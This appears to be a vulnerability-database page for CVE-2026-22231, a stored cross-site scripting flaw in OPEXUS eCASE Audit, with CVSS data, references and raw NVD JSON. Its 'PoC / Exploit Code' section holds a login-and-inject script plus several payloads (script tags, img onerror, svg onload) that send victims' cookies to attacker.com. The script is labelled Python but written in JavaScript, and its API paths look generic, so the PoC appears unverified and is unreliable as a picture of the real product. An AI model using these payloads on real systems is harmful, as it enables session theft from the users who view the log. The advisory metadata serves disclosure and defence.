CVE-2026-22231

Description

OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment within the Document Check Out functionality. The JavaScript is executed whenever another user views the Action History Log. Fixed in OPEXUS eCASE Platform 11.14.1.0.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:opexustech:ecase_audit:*:*:*:*:*:*:*:* - VULNERABLE

OPEXUS eCASE Platform < 11.14.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22231 PoC - Stored XSS in OPEXUS eCASE Audit
// Authentication required (low privilege user)
// Target: Document Check Out functionality

const axios = require('axios');

async function exploitCVE202622231(baseUrl, username, password) {
  const session = axios.create({ baseURL: baseUrl });
  
  // Step 1: Login
  await session.post('/api/auth/login', {
    username: username,
    password: password
  });
  
  // Step 2: Get document list and select a document for check out
  const docs = await session.get('/api/documents');
  const documentId = docs.data[0].id;
  
  // Step 3: Check out document with malicious JavaScript in comment
  const maliciousPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';
  
  await session.post('/api/documents/' + documentId + '/checkout', {
    comment: maliciousPayload,
    userId: username
  });
  
  console.log('[+] Malicious XSS payload stored successfully');
  console.log('[+] Payload will execute when user views Action History Log');
}

// XSS Payload Examples:
// <script>document.location='http://attacker.com?c='+document.cookie</script>
// <img src=x onerror=fetch('https://attacker.com/cookie?c='+btoa(document.cookie))>
// <svg/onload=fetch('https://attacker.com/log?d='+document.domain)>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22231
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22231
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22231/
[4] VulDB https://vuldb.com/cve/CVE-2026-22231
[5] https://docs.opexustech.com/docs/eCase/11.14.X/eCASE_Release_Notes_11.14.1.0.pdf
[6] https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-26-008-01.json
[7] https://www.cve.org/CVERecord?id=CVE-2026-22231

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22231", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2026-01-08T18:15:59.910", "lastModified": "2026-02-05T19:23:56.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment within the Document Check Out functionality. The JavaScript is executed whenever another user views the Action History Log. Fixed in OPEXUS eCASE Platform 11.14.1.0."}, {"lang": "es", "value": "OPEXUS eCASE Audit permite a un atacante autenticado guardar JavaScript como un comentario dentro de la funcionalidad Document Check Out. El JavaScript se ejecuta cada vez que otro usuario ve el Action History Log. Corregido en OPEXUS eCASE Platform 11.14.1.0."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opexustech:ecase_audit:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.14.1.0", "matchCriteriaId": "F2B018BC-4C7E-4788-8AD4-67F0EB588B92"}]}]}], "references": [{"url": "https://docs.opexustech.com/docs/eCase/11.14.X/eCASE_Release_Notes_11.14.1.0.pdf", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Release Notes"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-26-008-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Broken Link"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-22231", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}